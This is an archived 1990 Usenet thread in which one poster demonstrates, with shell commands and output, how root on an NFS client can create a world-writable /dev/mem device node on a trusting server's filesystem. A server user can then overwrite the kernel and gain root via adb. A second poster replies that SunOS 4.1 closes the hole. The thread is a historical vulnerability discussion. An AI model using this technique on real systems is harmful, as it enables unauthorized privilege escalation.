tchrist@convex.COM (Tom Christiansen) (12/20/90)
[ I've gotten nothing but confused and disbelieving mail on this,
so apparently I did not adequately describe the scenario. ]
From the keyboard of rbj@uunet.UU.NET (Root Boy Jim):
:In article <111544@convex.convex.com> tchrist@convex.COM (Tom Christiansen) writes:
:I follow you so far, but...
:
:? Do a mknod
:? giving it the major,minor numbers of /dev/mem on the server,
:? not the workstation.
:
:Um, only root can do a mknod, `nobody' can't.
Says who? This isn't so. I'm on my workstation. I'm the superuser.
I've got the trusting server's filesystem mounted on my system.
(It's a diskless 350, so I have to have something.) I can certainly
do the mknod. Watch (I'm root@cthulhu, my workstation):
cthulhu# df .
Filesystem kbytes used avail capacity Mounted on
globhost:/usr/spool/globdata
371967 280812 53958 84% /rmt/globhost/globdata
[ ``globhost'' is another Sun, but this works with non-Sun NFS
systems as well. ]
cthulhu# ls -lgd .
drwxrwxrwt 43 root bin 4096 Dec 19 11:52 ./
[ Even if it weren't world-write, I could become the owner
and make a world-write subdir. ]
cthulhu# ls -lg /dev/mem
crw-r----- 1 root kmem 3, 0 May 29 1990 /dev/mem
cthulhu# mknod mymem c 3 0
[ I actually have to choose the right major/minor number
for the server, not the client, if it's his kernel I
wish to crack. ]
cthulhu# ls -l mymem
crw-r--r-- 1 -2 3, 0 Dec 19 11:49 mymem
[ See, I made it fine, and it's owned by "nobody". ]
cthulhu# chmod 666 mymem
cthulhu# ls -l mymem
crw-rw-rw- 1 -2 3, 0 Dec 19 11:58 mymem
Now, go over to the server and you can write his kernel as a normal user.
I've already demo'd how to use adb to punch your shell's uid to 0,
although you should get the cred structure, too. You could also make a
nice disk device and read things if you want.
--tom
--
Tom Christiansen tchrist@convex.com convex!tchrist
"With a kernel dive, all things are possible, but it sure makes it hard
to look at yourself in the mirror the next morning." -merbj@uunet.UU.NET (Root Boy Jim) (12/22/90)
In article <1990Dec19.180541.7693@convex.com> tchrist@convex.COM (Tom Christiansen) writes: ? From the keyboard of rbj@uunet.UU.NET (Root Boy Jim): ? :In article <111544@convex.convex.com> tchrist@convex.COM (Tom Christiansen) writes: ? :? Do a mknod ? :? giving it the major,minor numbers of /dev/mem on the server, ? :? not the workstation. ? : ? :Um, only root can do a mknod, `nobody' can't. ? ? ? Says who? This isn't so. I'm on my workstation. I'm the superuser. ? I've got the trusting server's filesystem mounted on my system. ? (It's a diskless 350, so I have to have something.) I can certainly ? do the mknod. Watch (I'm root@cthulhu, my workstation): OK, so you did. But you shouldn't have been able to, and will not after you start running SunOS 4.1. I know people who know. -- Root Boy Jim Cottrell <rbj@uunet.uu.net> Close the gap of the dark year in between